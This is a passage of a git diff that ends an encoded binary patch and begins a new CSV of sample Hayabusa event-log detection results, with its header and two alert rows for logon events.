zfNw5FLR*AFn7imz1Qa~U2hnf){6MjD9TqcI9$aZ7O*)sfT0j{ci@bZZ-aO$m>_KXH
z1FP`<?DW6fEZox_OlcwAIgQ2pzI@O-bb)Iqg_yC%Vhy=Pj6njZ<;N0y;!!5|GhSe9
z_U|@=!UM~*2a*Nt-kS^jq4-mgUYUq$sXM;p{*h>;O8jtAQqts)ow2vPsNUPMSK@(8
zx-|9(H4cZnRxIS5YKtBGqBKgO1(`4~{U}_qW<lY5%&hWxXuHs=s;EW%^i5#d5gGj#
zTqc{79X$4#)dY`^`(yr&K=C_!`<Bu^3HGYLCgA)5%eT3+M(oHMr|)bAe77FK6}ZK(
z-h?jq*fK|QbSHgYUl$v`$EVM>SLqYp{WI^LGum&IK{hOw@VnBdQno8<K6f7<=-Omn
zW6#yRZG2feLTH4&b-mXb-al>rzQ!$fsx^O5<!tdu-|0IsV`X=qn!m9-uomC2RZ+Hz
zV|VLwgnoszzOz?z&=#wUxUI}L(WG679v6&OmgH?*97KNHkn!F*zpi?^`SRR3yVIHM
zJ0DI}W+F894vdvpif2>hgm4#o_^a~%+1sfuk(PG#Y};nOs6Jhk^1NK%%w@+7t^F96
zH4Mg2<r&HGkw2NUOMPg#zlR_F+-w=g%Qepew`L$MNcmoszH*QncIRlnG%x8SpbzBr
ztoXw2NV_Jm%;~|INa-DpY_{F%?&NxxJ`wnWeuXijgg4c=eam@S5N6PS^X5u$Ek+!0
z4X-;Uw|4AwYOk^Bzt(r+gXNyTvEhluZM5$6cppC8<|0o?AusX0)XMbY`M!DDL(Nd^
zt9aYx=MFdI%<9650bibdX1r`al3YAHr|+L#HezV$y8Kqf@NFFeVrX8D)TUfVwtUXa
zzt5_Mvnlk@iwsd|RQw~1KVLT$TB`9*dG5V<&1Y^03wR{^0aqJWYUnP%aT|v3I#UPq
zD2|HJAsdxa9z-`}I-7tVnXTm+=)r=YxlPxYuubp#`S5f6_;v5#Ha*?8PbE$kZh~P>
zHKL4mX@2T`WHifVwVvTxt)NOan+2;v#Iy^`ZXJ(D@yVG=7O7^*qSeByo6GB~^|28c
z^+bwQwRXv~RC>bw_&LM-5i7DQkGJy^SkCf0vqn<eTmO}oH;<yJrAyCN1+ui~NoYD3
z*Z0F$f5|dA{+IDP3U#GxTM*f^Gn~p3uOwt<nA34<ebcmyMKmInBmt2Ir<h+UCg+yh
zGxa#JV8+vO%c__Eqn0(3{KF`4PrI)ABAJ8{KDSKutJFS7m(f&T+iLM0b;a62E$iiJ
zs!dl9yN_GOSWTrxLbor3bG`Jg<7DTXJymzz23fNvK3cWcnj6de%xFf8Y4@jM6S7hD
z*9QpH*X4G=A!o{`nl_Zj+9PW%rjn<1zg;_?u3t}8@y*C{>RMpY3WB-SC2M<K?TpYB
zhnfoC`i4796|c6dZAAmf?H({q?U|m|Vvct#X`|6WQjRsgk+`)?+g-gSeDhg}Ya2>M
z!Tv%~Oa-6k@umG^{bnGIJ$$-ydktDe@`6WhQq==o9f)-UunCQkZz#{_$-z^-mEeUe
z*Eh1~CI6QIb$)V5BafiYa(=G;wvLkQHJ_!s#syzC&!0$FKT_}uN-vixL-|$mpVV1B
zyhTy{clCtnb=Lxlr6O<VH_z@V@Di`=b>mfMb_BBDNLA4+&k2;1djMJ5Dre|)%k-ov
z#<*$<P~+`Yv+XvQR+H$n)-5Fc!|-z;O>BvcNVTyYB~#Yax;_RXWk=?Qtm)cC6W`+A
z?B<IP8My{mx>-2RNXA8T1K*^`+Ru`e&sr$0g-^;)j7*g?{J@B1QKY~3d6T`=c>j4d
zHCgtWnb0l$d%m_2Ba6-1isPgD4|%~V1s?3v*|PikGbcz2Z{xJVjYr=pWaPQYCeg1B
z-KweA!f!u558}q=d5%okNlAT88S?(BW5SE(jg|ZHx02endfCSMUEfhP?@=DKp`75=
z*3`#+`n&exudESlmEMDP7d{z?(Cdy_`t_#i;>%~JiW0gl=i5$QopSP0412C?K`y1L
z$yIA9*(mS<Ow`*7H1A~@zOL0R%<AHE-pz|sm*wa4<aN_IFkWl2{dN6s{O7y2oR8p1
zkriJZA4{>N2YUC|8vIA_!utkSBLoytU6;ufte^~VY}U&~-({Uas<GCvd_+`kc%_e!
z&NA%aL|hyACe$1!yG(0I1ScD`Nqlq05&!Rx<BZjA3qXq|M_E#i&yt-t4<|lD=*6gu
z;qTY!0g-QIv(<uitVG`CwS!573%soOA57P$rfP1A*mg|&@o4M<#Y#!%6*U{vUs7ws
zc4Cv_Y^PHpGy_p?ZuS>pL}0^1#rZwsY8!Zt3DRQh?OpAzI#;#!EYQv3($z_Ffv~<n
z9caVPnai&|O)P|PU-l2Nj|pe|fqoRGFW8OFkHjW!`2lzPvvRasvT<uSZaT2%Ia`@N
zZ!h$bJH^7co}%95&{lL@NgsX7c_bFHEL}^^Q_1fgl9nl+l;KZ5f9{RLqzS&QqjQ!F
zAMIPFfoW)a%sV7!LRem=G9G03iDp?!!ed#bs>r5l7d)jq|4Ns6AM5vUEJvzUGRMsf
z$DQWe;|f=PN{T5R>-wd?qQx27vv|Q*aMZ6FO`KSB!ZdrgZ0Vla36WuG?s9dJZtHHl
zYLZfVRV^7+foU>*RQVWQuow)}HCDQvbC%C7p;-5OQ-EUwb9;i=sM}uTai#fN)6T_5
z11<|zoB{{HjpJjYg#JC&mS<$tHJOjUY(o88dWxw<-e&(Uyq=vZe0DS*qXxV{-XT&p
z$7#WEUw1Jj9j9(u#(~c}dtrqWOZ_`OT))s##PFl2yU|fK+2WT5S^;SDdNlNzftB@a
zqiZPnUCC&<hxTyU{p?loye|w~?c#Ns$}+NZ4*FCJJ?VPMlF0dIwsFE@xnt%*^9vi!
z)<}QU0Wsoq<>?HAIDF&GX<K9Vc`yEvi!!J1qh1VoeFog>I;~{=hOf@DG5VI})6BZh
z@@iJE?gXCZHCH2{g$OoLCUEGG$=8BON<@=;n&Kp*0Ndgk=9`v#y0)vTEQ&0*cFhtc
zmFAwy<r-G@-TXscm!mK}4Wb7+Vc+Kkn`hr;evQk>e4~Ee0UO?RbDe|YeagFYu}{|4
zb!(l<Pb6l)bA503YB9^-uO?_~_K$b+)ZQc5d^=lT^1Il4=!?gTHA9=aI0|iyz@q>1
zhn+@-sK@>J>FZ;t>@~d#leq0mRpcnJkHayPujB2m=`q1H(v|0Y_E6$ZmldXV!B(6`
zLti0kJABZddAw?)c>SMnt0$@KEmv`4Sz?W@YrDHu2{p&zp+<vd-SfG`izYY?1uMsh
zO>25d8dNGr*JC_~c6-N1I)pv#oJ-3MN~`wJ3~)||$$48DZgi+umQ#q#rm#uZi3382
zhU?F>>z|cxY}%WK7P*np`ohZd$g~3s;hnopGeM&=2pOGnh*_)hEG?&B-Mq`cV)`h<
zhBH(nV^*$c5C1rLgv>XVhO8xf`|?J7efE!@&&%dax8wiH%Jv#b(Tt`&vxh#>>iGN^
zUZ2K|t7%wloI5Z2m=Ej)IQg@Tx|vDv0K~t`D=Gf1(&mdcZ#>y|nPx<@(Xp9-WMBh`
zU+Mkg!aumz@5&F#u8~Si82&LSIjKUo^_~GXeB+bAj4e96&Ka%TdGNZ(9%Z<$E$CP7
zlA^1^x-~Mq(9quEX*2P5hJ6Aw{!A5T?#7qe2?g%Jlz}FBfZArO)7A4!y6&)1P5XY(
zIjg(4UQJ86dEtYG3lpG0Qx`**Z1$pfg0#s~{6N1aoToKsQ^yD2v1;8ii9o7z+lo-h
z#;(OiHYz#!@#!^3LiYL*h2EO}&TF-v0Qd^<TUWqwHJOuMSXUdSnqltE%B)MqG0<|l
z%?kvM#jTYTk~iiLZE~eJmN&5qT078J>Du4Xh@>kxfj`HmOA5K7n3;)aPeU5_3$P1J
zPdVVCIKZ5hw%^{qHtSE`-|k$@p>S1`@_w?UQcEJH4&KadO|4lHJL)iCyz=SQH-#x<
z;8d_%c?i!uV5$!c6XQ=!kAq%vvsu;hk*ej;>WdsIM|8ty-(NZ3&)r|oA3Pijjbl}$
z9g3d#>pZL~F3UWy4aW-VUFPkv(|2BL>oMx<XnEhXLOhh^t{V!Fqh~ytsl(=Sj%-zr
zH%BlO(eI5V4bz{e=={$&{&5lKzm`|KpQesEUyrprn3fLfyT9T`YZV{p7faT?UaVf4
zt+zq2#XXXV28>OMtnRLiB~dETZdzIqRGv1i=f|&3iUYPBS?i^)#AQ>4bm5JN?JDgk
zT)iFedd|0HMV|M|ny^MxMnRNO@<|KYW7iryN&Bk~)yFeFZjBHzw;jmW&1Ry{ANI^M
zAo(5ES2PDLYpl?B|9C}aFFRra;p`1z0{=j68mMs@M^EBh%<fiSyV9IwaN{q4YK}*|
zG*nhZRsyby0050U_2J?2U5~BVJ@4N+99GldFRQC+5S8hOVGC(v=lD>)bJUfGtT9<m
z9mBp`+`7w}=u%#$Kj$1?UGOC!r%{h&7lFlSQT>21y-gz~s$shP;qIFAP4o6lkmp_M
zQn<~}Uy8K+0gQOM)b{#XsVZjqCOTcMrmX55YG!+THacgA*RRS{e0_Oijh+$tzSQly
zU-_cm)TzHM%G5U{d#$yl(dNIygM7}o{R_x<9RYIF7Va(2yw%Wme1=HGh;2J@#E_r$
zKDk>m2&|kbP{hm9JYCvbZ8f!fyak*&7sV8{B1F*H0M4^m?jl)%^)<y}|3~5Ea`Y)K
zUNWghk$lTC`l3aB4`uW5eqe=I^)a)sy<wX4hu>P|a>Ao7<w?@??&p+xU-Wdxxu3+!
z3h*7~;o<<|@^Wgs@9PfnFnW|!k@v2DCW7-~$Dua(%J2~Oy)y2ymOZ=YK`SqNv6XSm
z?;^*aV71j+vuo?Vp=hO3-SKD2MWf+Ds9yF2Gkw*_Mwb))G>-m^sZN}u|HvYQP*^tk
zMC|)T%T+YX=`A;1W_-puaXtO!e3z*%ei81Z+>`s8j?Y##!p!Wa>4cDC#(w0+q|W~P
z2D|TIv%=ap!<vNT6Yp$<R-!=769g9UuXr2J$B{4N*O>KLn3)J=UV{u)%-%n^%Uc;m
z4{=Ymq{?fiNd~O4tOfv5RNE&Pht92yc6B9nvWYfqA^hj0@v;Nza(7r!tvb_ZI6vT^
z6=yT5*p36<M>C}YCWej!N-+cZ4MW*hFk{D7OT<q;K2WMzrk%FPv~-VRCc4_?W{v~d
z-pVP*b|yK^8TOa8?_%!9(??>Q6(2_LVy7WFRf+?o&ugza+!7Y4#_x3r;#bYni%hsY
z%HMG{Yg&tG-lz4Gh^06c+bz}uFthW3<N-^S#?z(Mwhf<?Z$s{ghQ~s_6lG#X`Os+Z
zICBje+Yrg@^Tt%lcgCdYnDZ-rvt=c))T&HA9?w^Mm*#)>K(cKaT5k<zT6V4}Vb(MI
z=~XJ%^T3>SZbiq$7s~+pqPh=)+eu2mlEO=ri^tr9HG9QhE$*@He9L4DkzPDzzKLpx
z#rooB%@n3p&0T}4PVM65kpv0RofH?}KW~fn`P=HKx;f>^36v#%Hh`oxM-j+yPg@d2
zDoB9Ffs(V=JQ9ZwCtciUIR31fjK9<S{?@c}vYFi2<zxCB4G5%kksB$uInLOoYrx5@
z=**HriD#py`eJ}WMyR&~8F`)N8v*C!z~9(@2(|s?RSJf708&8gV}3`4`Ln}E@$Yt~
z-h&TUm&$geXn%vRqm#5IDSUvm_dyM2R&G-zi7z{bxANeAQ&(x~kdHM#@V!*&S-{2&
z?;CRAAF40bX5xZ0WA*EdHY!iQ>W5d8)nqhk!H#H)EDPJMK7XtMd$uq+da66{!QZW-
z?b3=#J1a}$4Fk@PQ-j_^Bx$TiJG}*Jf%`oMv(Qk$*+G#E8GbS)QqJPR_&e^x!?zxS
z*7O}%_sZ5QS+a(l9W5`)kuTy;z?YW3E)}r;vLm*Mz!jt={79Ojg=SGj68>jImgohZ
zIy~fAUaoo5h$kt8Vy~+o>+`494zS32>QBruT2s%ZQND>awz*={Zdk>=9fTIof<|)Q
zGE)W;xQ`#Ouhnygd9};i(Z%&##}=KO>$P0xVAnSs$JQfmuJ<*nbP^+coL!Zz71iA)
z&$hG%*}{refy&*yN3ZK8+hwpLAL+_|8CYc(8In7SF#D0!+^nxzNz<c%v#)y9kJ7h!
z6_4QVDOww%hwR2+6k(5?;8dVryqE0m%mLHRDh~9Cie;VMC2yjW+HPEjn=LF0-@U~-
z52%sD-+I&jc}KF}`3w}M`|i7PL&-PjlS@4ilW(p}%32?5zH*8nOx|DAyq>RKHT7PV
zrrW$|hesGs&P^h{&BJ#Ztj4qP>_`!jt89D*oJ)xu*Ayf5+~Xzk$Cac)w9~|qOe>d0
z9OpSz1Cq^)z_$%~ANbHm@XgS$-jnm5*LX@J2mZNt3m!|G`*z@$;ZJ9wb~CbP?57{`
zN!A3y%Q*G2>NaM%%Bt<|bRvpw3mc2>?(b1YV~=~_@Wzbi=+=z<k=LkI@6V*D{7uHZ
zCcqoE8Puz#5!=tYmP%)kj-I`9V`EB(<BfQpqe$6X%I71dLYouD9PRMjjU2fpEsy+6
zPq}VVbmX5I*pP@XbEvu-)*%Z=n-<M(`I)#JCF`A88xA{_EjHXQ+~y?(m|(0tW0L4U
z^SH_#J+zrU>m%V{eQ0(%;nN(8{`|~#;7b`7B?r#-bMjICO)Tav2(_k@w^KKk{B+64
zD_a)fm99VNmIdP$uQ)Q_ZsUX|VbOMWocGUK6WjMs>uwBZ$AS=8DA<m3&(^L35{OV~
zzEjR01T~B8dezRC=d~8|9paK6FB-xTi(s#bnb*>govI&o7I6Hz8m!=gC2U6>nMG=1
zEw;nqovHJ&YH}^Fm53Hj=3^`1tOap1<-CDQ7wf0KmAs!FW|SI=5z0hMmXW^`myYLu
zi@F;=M#o~1hTIyE>t4pK2@aCi*ChTRWfsch2R?$ZCu}lT;yp{RS5X&wwS7(o?%7&u
zyNZ~fx@F~Wc^2$7-tkbr)$m<RkUXSVOil&b@LG!sScq849c(u(6)pfEWx_pk<%?$a
z(HM>tH_`1^B(Pum<`_G9K+8-|Xpz{_apm`?{zWYC(qF;D0>-_<=L(J9Vzlm!Gh(=W
zt@Xk2PeXbtMb`xQ1XoSGc5dNDY$7Q1BkAv$Bj9$_gIGLbvDch>&ex<^$_4TPr)|S|
zI1U~Nb^a|qmYI@4MfbZZ>eA^`qx>+iqzNI*U5B5z1FUu3jtvu*DPIMbY+|<g`n-B3
z^_LPzrEb4Cn)9Z!8G1;+sre60K-FA!E!G$V42z!Sj%WtG+foC?9hMT9EnXh?L_Nz0
zwX_=*#d7uJ8l4%`_9OWnH75AaRzE7$axrnl-Q+$#%hk|X)$*hp1@M}o!Ib5Bw>kW2
zm2T$gH-em`Zjew?&r#MQ=~c;WvL$QRtq~=-5`@xULFGFVw|X2Qd%b=F&Nxr@Mfc#v
z5jHgYue7ANXt=!(_fDOLkY*5(Q<N7~rbtFQGq(?I>-BoS%bi8w_+YZz+|_Te@dTR<
z34=6k3ZF{cZ#=PAuku@sBEwGH8yC#!x3&H%m`F=DUw5tA(XBOax@um+I%slZ^wyUw
z@(^Chz%?Zox@X%7)>}-a4NWrQ>|NKBW^a^c6dIrz-<o*2w%^OR&V#;cB)e*S9C|dp
zDD9>7uRdlD{N2O41xeA{%x2y)LoaX|s-{Z;$)V{CXhV;_^x5K=g1j2#G|yB?EjMnu
z!s>A+7YeTrG@m^MsP6~d9Z^J4XaowE-LqID*(lfh=xdA_m$!YEOoT|hlU%^}DFzu-
zT@cFFGAS%e(4vpSE0*$z6WtU=v}nA>af8okVkmK{`b~-u9QcPhjtFAcllA$pGw?Yp
z3|!6@_CvQF@2N$=aP!@Ff@@>DHL>c0GMES;IX^{QVr7j1`i&}-@#o@5c$^>rwWQNT
zBZ-BucyxU`KYkJXOvy>XgSf{PjQ9`Id8{F|`RtcnEQMhNv!m(JROfLvGZ5bc1Z2*M
z|2y*ynE67SNwDW6IQn;n0}65eF9T>S*PyTcQ#a7FM)hDqa^>0Ue#?GPN<{$^QsmKz
zd*Adk6)ob7*>2brcH8fd)4IAa*4HM?>4Q1WZL3oEO7i5ds6BTCp>{TN#y(@wM%X%J
zUVZ(gu9-Hs3IW(RKu)MIDIqWo`^|8bB{Q{F_~PCE9kexIcmlZQVnP%!^t?=x3tWh*
z>cC(EvX~ls{H+}4l}`i4bEOJOci1bd+(heD<pX@eS`9qR`oW0ZhKw!w=eFUSO?g%q
zs;UA#MBIHrCT%melVs2V{LALBjsP#^GSqz5BthrFeWB|yT@ck>1BP3E>hnocq3Q0(
zqb>jCnJ(PH;B&t|Cpq0nF0EG@)Dbl}Ztt<TN7-v44`3-A^aigEc<=<jYkkT!@g<q5
z6(4&KZ^zd!a*+@7&HecoMoz%-tT1JXB*?iglD0&dc}ESDNUc}Iu(VITfE{NPnK-0J
zG{Q!~Z3%ei3Vx09LExv+fd;4sG<MDAB$#YU6=^nB&9|g{`Sc}p83FZ2i7M$4;P5n^
zo>iBm!8`1?q6Zbk%Nh9vzRXD({;Rd)1@O;%J%}u%7TwSBGGD>_CDEYXvPNn)l2^N+
zRhb-=xoDv=0LV$jb0>%Mm>1N{=&j7BGn=kp%{q(;<{&A$no3vvv*X5UZ>l!JMkges
z6P--0t%o<t76g<Wkcu5-Bi_Hr8>UlW<EJ;->ddDQfu<;bNd|KNZiEkN{ov$j<reP}
zdsF@iw&Y$yP1M8he+|<P)(iC<s|^8YPGn0B2cwjQ5bYauZDs_LJ!4IIYPLbnNJ$TT
z<i2r0K#4>y{EO~9Fz5_bDvSzsz7hI4)%yl$rWra203Sao6Bt5Z*o-}ib|Ov_5x76o
zoW)fQ8U`qoR2$q)l-(m8+fD0-FGq@yH&=u}M&PCp8YUc%r9mLpV&K2ycFF+w19lI?
zO7HOdO_(v&fxsy`o&ak&w=f%?P#X492&RGwkyzy%Xpd)4aDH3_U-D0>5ARa#EHdZ$
zmEd`C)IE<zJi?sg<a1OOQ3S}xl+wrzkLhbK>_C!u*@{Wm2TL7RwJ=h*_|A3g?+ec5
zKRIF`ni-oD62_R1e-L=-cEb?;t*9K|xzDf%#AwtAxp9C!WqyGd2t|@Kg$jc0WEzR&
zHczI2RJR}ZlDJ{ebnU?eUP0x#U4tXaa3+aBJdHVrLe#ZY1Z>KXS7>x-YtNazu-TzF
zZFIF^PL%M+0otUVg^IRdzX3!C{`LM%c@24WeP6Qt`dA3<)V@cpB*}2e)&b0#^}2+9
zV4IAj9j+Fi^ek;w3-kt?{P87L+N>H-W*5_ZoseiT*U12PgXWgPiZXdO7otL}yJjbx
zcZnz5`s!Icwa9fqixU-j6QMp#Q-PU7l{HN$!HBo4wZ&B6p2*hY0%J>Bp1X+c5^a;i
z4}d3+?klj0KnFXpxU8$%M%=XImoF(?&j_oMq6;UUnico(jBg9p`?gH;(KqB6@9M4%
zDdL%t5<?5m{-wtY@`;Mm?^Atlly2}A3C(C^pb*piRrt*TX>yNB$k_EVu}AdGaMIZQ
zdbh6tXIt>s4lJLiuLT*AZRci5{rc~+;X^n8;k~b~K~1i>ua7$+JPyB7)}xqhSWosS
zSvww|wv$UmDzG~;eE*(sy=Wq+5tueo!lat{lGzJ2wlC#iCe!vYAbeH_PO~8C8S@s&
z;GQKxd7dDBhtn-;HItf4FPA2LJ@AY>N@ZDqb6sthbaMaq0GUDuJUdnN-IO=lEFjD<
z&M?~kI^Ju^iix=p$&DuFeQ-ClpEIf|9}YeqyFv^aU4;3IBac<(pvt-6G=f_J&|z4V
zX-*Zj%|^7`{nKVM<yC6AOS#+PSabO?DPz;EwlxUKy}z64FDxK@avsVB$nae{_?0pE
zXECUz?G{g7_<FGN*R}!Vei&QdqDtASyR?GIU$00~W6?*ae!p!<?@8Vz%yW7e6zU$h
zx5-UKA3xW{35;`^x)qj6TmX059LnC2242~7$U#SVd7Wyr#dJi}>sqnVdF_$hkA^>2
zc<wTM--5YwoNkgPKOS}rK>7jnM=_wsW6v%DJN=1LlXA>91-sJxaN-!{l06w5?WqXR
zaQT+n@4HJSRUGz9MRKjxk@AbGb&k#VR{^f6$0eF_v=vKmeKsuq^Z_(J?U`6=P2_DW
zC<^v4Gbh^9`QGJFP?crHH7XVigU*sbV&BN+PT;p=lf>qg<N$diyaChy?K{_n5BT6%
zbl-7eytdaud4LLq*N7=5DWzg|6S?A)5R0`6+~Gpqq1?F7cS`ni3m*_|JahFy!{-O*
z)c85jep+xvO|dt}o8QBo2LB?(<C|ODxysnfQ1#A|fmkhwh0bZ-Q`38ydr<aqf0ock
z#u00Cy4@|j_co}B*@draJ3Vd6MbmkGO$@?X`;O60&4;L45%d9EzfPZA8qVF`GbWV3
zqZ_2YdDkrng1r}{wTbmg{fq>ek90_OULTZrw4C|nEo)Hv*=x>wyqrg&OBE$Zt$Vwk
zNvL1Ya#B{&<XFgclw=8&Ye+GIhnX)5Nk}2dcm^^~iVUcj_K>vD$R!4z=TrVZe)k&O
zAfBDR9@LTCbHFt{^r2%cN>Z~d%v|pPAsTE64A74QuuTzrdnD2VZQa)jL0-24M#mOr
z&qUz;G&M*n<a7Si3@v}B^g0rrhVP4jty-N!b82Oavz$NJ*Y#i<UIoyBB;P1C5dltI
z!ZPM^a5`w8U2BSPxL2g3oI?|7SP|~}RfgH1bB8&oV^y93mq4w@e$NexEjK_F7tRmx
ztUx0@<wI1nhHmdqAvjZp&(x*pG)Azgv~{@6h$v1kxiJVBH8>?kn7P0y8bqzF@FCDg
z%-}5_AMzJDaMlr?@({BG7NI_4D)3eDbn{I!A3!ZwIB}VSFJ=p}FBkam7UAglz8&Nh
zCD4s|v@u`UM`>M$aPVhcz=|9ygDkeNq4F)F0?$W|N~Ygmumt&^O+ooLhxS=jR@OEX
zSZt~4zqad@IYQi6_bI$$N&TC{?*H0h!JO&s#^$-;R#I^YVnIozZFH`aF3yw4R2QwJ
zE}(aGb?}@6dJx6i>hk}oU2L+VB0L8@f-HJk87G%Y7h)Y{-V@svquc8VcZ?<yA0GH@
z*a!-s8I`9xyK=ayd(a>w(K7azU431;)ZB<FTOL!>7~(?+H<{~Eu}JO4=-*?hOiiN_
zk1eo*l#(7-GxJeg2DeLYu=&lvMS6*3?}1}PDnS#ZE9PuZhw4_5N4wqaYw5=fPCM=?
zj*eliuz4u#dxAsKo1qaz3kzD#2!Jy9b>#Ofq}xg}!y9l*V1h@B3ag{aXp*M;o1+B>
zJ>XS|L&Y^>1RWA7TxzJ%kX>_0RHg_q&>iF#FphWtHspfvhZM%^JU}st5B#b`4$%)h
z8$$~ZwAOK$ng}1XfflX-uv5~-(`kUEoHb^z!KH*WB-EPpWX$G391PC}<J6UVx;&^P
z`k4;@sc4{}JT`*_U~rDtSja-#NGC!k{~?kaaw3g<hPMlU8iZG2m2oB^_u+K3=6R9w
zebxFJR)LnKXpH!D^HROgfkyk7W`LEHmhojur8Dd)s<gE4m9&M#9O!EOxx_<GL*wiP
z4#pq$l_wYv_uOTV=|7MXg0R`Jw?+v|gS)3u-t371<8`+-OVH0R6ZIJ$TcsPREJ+Yt
zs~HUss93G0%@2!SuS;VJ=088kgRA(k=4#9rvZ^sj{=yz5UZ=GtU(kS`n~sKT{3SO?
z-aHhfk+K~(i<PP!r~@=?Ij5nk6?;w!37Lp*i{4fWR`m!Y{>m;t$1ygvPTTFmu*GVe
z6@9VFN^0rf;QZ<=ZmZy<ozI$R20Mg37(`a}$iv#YT9%?a_^?Gw%dYaZDq{K7V>XF>
zvF&zU90!Ya@$_It92q<l)~ofCc1viQooI$N0XLHjTopLK`vqbnN7hcJfqfC!Qi^pE
z=u}194WIAqjt|uN`%~aFP4xVZoITsRE+@CKH{BHgiNdzl%-T+8@2YY^a&0Tl|BWqO
zG65H8n(lfRu{*0*T+qsmjM=vC=yXW!4NmOZ+DIAfi{Kyhez1c*<uhwN<yr-wAXVer
zObC-~tKI+sl&wOsAVBfZr6+6379=GAHaILiS^?mxgRI`?a(TZz`fa6l6hza(E0MU*
zBcmKb_85O}cHU+~GQu6>I<B>TKY&B<SGi$EcVSB(A&?|S<PpF$)!Qt{3n5klsJ_5h
z<U$NyeJF?FLTub*zVTwbq8+M(+;tzZY%N$}^G#vDd5%|g0)leTWA3p;MlsV74U%x|
zBS#>~n>|D*^63yH)u$4G744!E)ckQ>6>!J3hrK2dQ0@7etwcT!ZLjv-^G1wHU7%-_
zK_m+8_N#AW5KeLTU8d!!VXCsEsHAUs4O?>F<E=m)#+X~0WGZoJYGjJe%nnXlB9$@T
zS_9R^p1@d0X<t*1ntaK%X|zgP9ZKYyZc?3XPS5sdZ?v(CC1jj0FWW;9vEMT|w^`Vg
z)Om@Sf!-<dGxUQJV<(}UEo_K<MG_|GC$=K~meXsXrSbqNLdL9`Q(raivY`j<LM4*T
z7FQ;qF5G?BYj|7o;HrbgYP_{X(zVi}Xv+TpCuYT+5=qJ0z7L>XsYMtUb%B+l8F^<(
zFSi`AiN}=L1QXYG^K2eqY`D37*5^PnI}QURoX-l_w<C%!xq_s><N#AJfy|do)&pb_
zrQiZqMs4p$%+?!G!92f`z+c7xI4z&A()GsuR@pTU8TLhur@UDFs+qd}s(HG8U)uai
z`DB0Z{W@R%mVFH2RG~n)Bz^SLD*>}zCCRhN0KR5KJ(%gZinV}{zh~cJ4Z^&U(wYQb
z18PW}7y`zvg~MQr1GmQl0kbERD&RS&juz<9!2IQp4#-AXg!1;}7dL^Hkbg&|*K*oT
zng`9_kMD<~4%iwpLaaCL?Z;*Ka_fKvd*!8)6+&_|Sl)vQ2)~&}HD}SH<<u3jJD@Qo
zqGluhSjEpX6%s8Bu<#X5!FFY;nSUqMmXY461!eu~%gO2O>*b~`$IJZV0Y@{Yl4A*D
zsY7_mC;=})`<X7m+LVOE!U21V@B6l<`xE!28*|ndZ)^7gM9((LAnH|7OSNRv-N4Y1
z8$7pDNf;dl29h7#<J^nYMao%hp*!PnWe_c~F=xWifIHw3;ouBhMfh>f8Ny5yB;p1C
z3e4~?loFpDt2t!*ZikGzK_&=5IRnlm_or*BEDvHfh-Yhvu;czHO!<aExqQRR?KS`a
z!1p&WfSe>S2nqlg0L0ICLV%=J*>g2O0DwRs002Y)2tXrSLpcXqJ4bp$TL)u0H)|_`
zd=Nm2T!5b}|8HNJ@skn*3@E|R0oQVMw)6N1l-A%%CWn4IVS98Wt|k%ISn+12O_!c8
z0Bx!u+hp_xYf}qxi0E_)j#nv;bmC;^b#~eO<sEyJP(1jYJ?4WBT~f1?UT4`vqUL>=
zlvHq(Ykq<W7cUffM8!!#)asD2T;PXlNUDselp5x=22rTm0^*6LxEm3X63M^U3$zRb
zPJq>c;Jm*<QgR`Q(|6!bBI3fD#6(03-4cc2^-zQWN$slac0ga&D+H3ymi={B9g|zP
zAlA*XU2`T+2%@hV$3zXamvwL-8LhqmwkPRo-pg&K+O_5R)%(n(ND;J0CmN=U-PtEY
z4b$1@n~L38FC)$QkUNgg*fbD|OkG|haaLB3YI=q0y=&<?c%Ub0<M#7*WLp1B(H|)$
z2K!*N2%LoMZouy|gcY20jo%q|RWN8JuK)ffy8=)TfbWui0{u_w_{`m=koKc%*uVe)
z2>+^%`gV5zUmO2>1SZBy+paUfgj@qZ;lpeqlW#J>_*WW;aXtJs=#6(VRVg;iiy#SW
zK)ha-ZJHf0cU}F1Pp`vEL}@E4n$d_c>ZTfY=taonw3af23w7J_{p+2I$-s_O?fNeQ
zZhVU}KHrG-10XSWA&oi*)$d6h6?eRJvtu1i-sjs`&z!c_8mb>4KxfC_!<^X|+Tn+T
zLQ!ND$=|~z4{go4CEn;rDe>Eae?@?QHaCJ76p-uMKLM<9JSmyFlK)XTQcROl;$Dzu
z*(eL1C@I@8|Jx!XTM9*!H$e~T9y23r4owyxPg|q0aA7ENB%40}XC&MIFF5sY=vlvg
zkd^TvqcCfN=(FY+dL?3}Q69*lJp`G?`4umfae>$XOMP30fWjfxy{*5(Z|c^BcYI+f
zihKV02e|eYCp)c#sfaj%gP2WT>7RlYH1l8;t~>oSNPQWi%U>8h&Smz|J{Zq}G5Xi+
zJuh6x=lL6p2(?lboY%WrvCrlMvrlB_SQ~)js*~>`zWB2HRTYORuY2=Ev|b7cuZKj7
zx<9h{FY5{jL<{iW_SN7j%S`7-p<_V+0FeJ%e*ZhADP(KoWNhQ4tK@EH?5O<@4VRPr
zcLv+BxnN&E*_nR~H1xkQNckBfx(>!xj`Vc@xc^T=LW}+Tj~{}FA405uBOC$)0C2OS
z|1VlsTL()6TU*P2l>Hz1WIMjNiT@OZ1r7iJ|8IPNApgndUpf5GN*E87=}`S-)0YGQ
zfc-aOH<*7CJ36^r89V-`hF^)u`7!*IX-)7ydu|f-pQKJ^#@5F4|GYE)CkBSCNA2{L
zpa7G@TmTsVRyG~(|Eaj6nX$2xBmF-g|B*`_g8w`;8Zbcq3+9hl|Mf~31^q`iI-2P_
z7#k@%Ihfm+{>O&=yNmr-4l~;j0RNZ6{hwX<?<VnI$#wVsh5UaTNI6N+AL#-BK>d9D
Nek4zK_zyq-zW_*CdF=oI

literal 0
HcmV?d00001

diff --git a/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv b/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv
new file mode 100644
index 00000000..59d94e55
--- /dev/null
+++ b/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv
@@ -0,0 +1,14207 @@
+Timestamp,Computer,EventID,Level,RuleTitle,Details,RulePath,FilePath
+2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
